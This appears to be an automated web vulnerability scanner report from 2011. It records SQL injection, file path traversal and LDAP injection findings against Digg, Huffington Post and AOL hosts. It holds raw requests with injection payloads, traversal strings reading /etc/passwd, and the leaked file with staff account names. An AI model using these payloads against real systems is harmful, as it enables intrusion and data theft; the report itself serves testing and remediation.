V=[E,"/_cqr/login/login.psp?uitype=popup&sitedomain=",x,"&lang=",H,"&locale=",A,O?"&st="+O:"","&siteState=",D].join(""),W=[B,"/auth/login?devId=",j(z),M.length===1?"&idType="+M.toString():"&supportedIdType="+M.join(","),O?"&st="+O:"","&language=",H+"-"+A,"&f=qs&succUrl=",j(r)].join("");g.openWindow(x?V:W,{width:528,height:G?530:395})}function J(V){b=0;V.preventDefault();var U=[B,"/auth/logout?devId=",j(z),"&a=",j(d),"&language=",H+"-"+A,"&f=json&succUrl=",j(r),"&doSNSLogout=1"].join("");if(k){g.openWindow(U,{width:528,height:G?530:395,focus:0});i.focus()}else{g("<iframe/>").attr("src",U).css({border:0,margin:0,width:0,height:0}).appendTo("body")}}var K=R.response,L=parseInt(K.statusCode,10),M=S.tabs,O=S.selectedTab,I,Q="click.ma";if(L===200){var P=R.response.data.userData.attributes,N;if(!P.pictureUrl){N=P.providerDisplayName;if(!N||N==="Aol"||N==="Aim"){P.pictureUrl="http://expapi.oscar.aol.com/expressions/get?f=native&type=buddyIcon&t="+P.loginId}}f.trigger("token-success."+v,{key:z,response:R.
...[SNIP]...

Request 2

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d2--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:23 GMT
Date: Thu, 05 May 2011 01:18:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 118535

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(a){a.fn.globalHeader=function(i){var d={activeTab:null,dualSearchBox:true,moreLinks:[],morePromoCount:2,moreText:"You might also like:",moreAnd:"and",moreMore:"More",moreTextHeadline:"More Sites You Might Like",webBaseUrl:"http://search.aol.com/aol/",webInv:"hdt-spinner",uiHat:"#head",uiWebForm:"#aol-header-search-form",uiWebInput:"#aol-header-search-input",uiWebButton:"#aol-header-search-icon",uiHatLinks:"#aol-header-links",uiHatTools:"#aol-header-auth-link",uiHatMorePopup:"#aol-header-more-list",uiNavLi:"li.nav-category",uiNavADd:".ad-728-90",auth:{doAuth:false,authenticated:false,authState:null,unauthState:null},search:{uiSearch:"#aol-header-search",params:{}},fn:{}},j={},f=this,g={},h={activeTab:null,moreLinksBuilt:false},c={init:function(k){g.$d=a(document);g.$c=a(k);g.hat=a(j.uiHat)[0];g.hatLinks=a(j.uiHatLinks)[0];g.$hatTools=a(j.uiHatTools);g.$webSearchForm=a(j.uiWebForm);g.$webSearchInput=a(j.uiWebInput);g.$webSearchButton=a(j.uiWebButton);g.$search=a(j.search.uiSearch);g.$searchInput=g.$search.find("input:first");g.$searchSubmit=g.$search.find("input:last");g.$navLi=g.$c.find(j.uiNavLi);g.$navADd=g.$c.find(j.uiNavADd);g.$hatMoreList=a(j.uiHatMorePopup);c.setActiveTab(null,j.activeTab);if(j.auth.doAuth){c.buildAuth()}if(j.dualSearchBox){b()}c.buildMoreLinks();c.buildDropDowns();g.$c.bind("setActiveTab",function(m,l){c.setActiveTab(m,l)});g.$c.bind("setAuthState",function(m,l){c.buildAuth(m,l)});if(j.search.params.initFocus!==undefined&&j.search.params.initFocus){g.$search.globalSearchBox(j.search.params)}else{g.$searchInput.bind("focus.aol-header",function(l){c.buildSearch(l)}).attr("autocomplete","off");g.$searchSubmit.bind("mouseover.aol-header",function(l){c.buildSearch(l)});if(j.search.params.searchText!==undefined&&j.search.params.searchText!==""){g.$searchInput.val(j.search.params.searchText)}}if(j.search.params.useCustomQuery===true){g.$searchInput.after('<input id="search-customvar" type="hidden" name="'+j.search.params.customQueryName+'" value="'+j
...[SNIP]...

1.11. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /buttons/count?url=http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response 1

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Accept-Ranges: bytes
Date: Thu, 05 May 2011 01:23:55 GMT
Cache-Control: private, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-CDN: Cotendo
Connection: Keep-Alive

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

Request 2

GET /buttons/count?url=http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527%2527 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response 2

HTTP/1.1 200 OK
Age: 0
Date: Thu, 05 May 2011 01:23:56 GMT
Via: NS-CACHE: 100
Etag: "54018d3f1db7e92a658590f8fbfc22adc1e471c2"
Content-Length: 101
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Thu, 05 May 2011 01:33:55 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://techcrunch.com/2011/05/04/mashery-funding-2/%27%27", "diggs": 0});

1.12. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?icid=navbar_huffpo_main5&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=47570434?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

Request 2

GET /?icid=navbar_huffpo_main5&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 01:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=78811701?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

1.13. http://www.huffingtonpost.com/threeup.php [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /threeup.php

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 83591090'%20or%201%3d1--%20 and 83591090'%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d1--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">LIBYA TARGETS AID SHIP</a></h5>
           </div>
       </div>        <div id="857719" class="grid third flush_top threeup_entries">
           <div id="entry_857719" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">GRAPHIC: Photos Show 3 Dead Men At Bin Laden Compound</a></h5>
           </div>
       </div>        <div id="857555" class="grid third flush_top threeup_entries">
           <div id="entry_857555" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/afghan
...[SNIP]...

Request 2

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d2--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 6018

       <div id="857597" class="grid third flush_top threeup_entries">
           <div id="entry_857597" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">            <img src="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">CNN Poll Finds That Most People Think Bin Laden Is In Hell</a></h5>
           </div>
       </div>        <div id="entry_threeup_central" class="grid third flush_top threeup_entries">
           <div id="entry_threeup_central_inner" class="entry no_border world">
               <div class="image_wrapper">                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273918/thumbs/s-LIBYA-INTERNATIONAL-AID-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273798/thumbs/s-AFGHANISTAN-PAKISTAN-BIN-LADEN-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                </div>
               <h5><a href="/world/" target="_top">More In World:</a> <a href="/world/" target="_top" class="threeup_titles" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">                    Libya Targets Aid Arrival...                    Bin Laden Raid Photos...                    Pakistan Had To Know?...                    </a>
               </h5>
           </div>
       </div>        <div id="857624" clas
...[SNIP]...

2. File path traversal  previous  next
There are 2 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:



2.1. http://o.aolcdn.com/art/merge [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /art/merge

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response.

Request

GET /art/merge?f=/_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd&f=/_media/ch_music2/radio-legacy-muscnwssponslnk2.css&f=/_media/ch_music2/radio-legacy-promobar.css&f=/_media/ch_music2/radio-legacy-feeds_subscribe_en_us.css&f=/_media/music_en_us_css/aol.music.header.css&f=/_media/music_en_us_css/aol.music.footer.css&expsec=31536000&ver=40 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/css; charset=iso8859-1
Vary: Accept-Encoding
Cache-Control: max-age=31536000
Expires: Fri, 04 May 2012 13:03:58 GMT
Date: Thu, 05 May 2011 13:03:58 GMT
Connection: close
Content-Length: 26142

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin
...[SNIP]...
domo:x:91:91:majordomo mailing list:/usr/lib/majordomo:/bin/bash
quagga:x:92:92:quagga:/:/bin/false
dovecot:x:97:97:quagga:/usr/libexec/dovecot:/bin/false
gkrellmd:x:101:101:gkrellmd user:/:/bin/false
nobody:x:99:99:Nobody:/:/bin/false
altadmin:x:5996:1026:Local Technogy:/home/altadmin:/bin/ksh
ashishbh:x:9480:1026:Ashish Bhatt:/home/ashishbh:/bin/ksh
astevens:x:6694:1026:Andrew Stevens:/home/astevens:/bin
...[SNIP]...

2.2. http://o.aolcdn.com/art/merge/ [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /mobileportal/s2c_modal.js../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response.

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js../../../../../../../../etc/passwd&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 01:12:53 GMT
Date: Thu, 05 May 2011 01:12:53 GMT
Connection: close
Content-Length: 20992

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/bin/false
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL da
...[SNIP]...

3. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

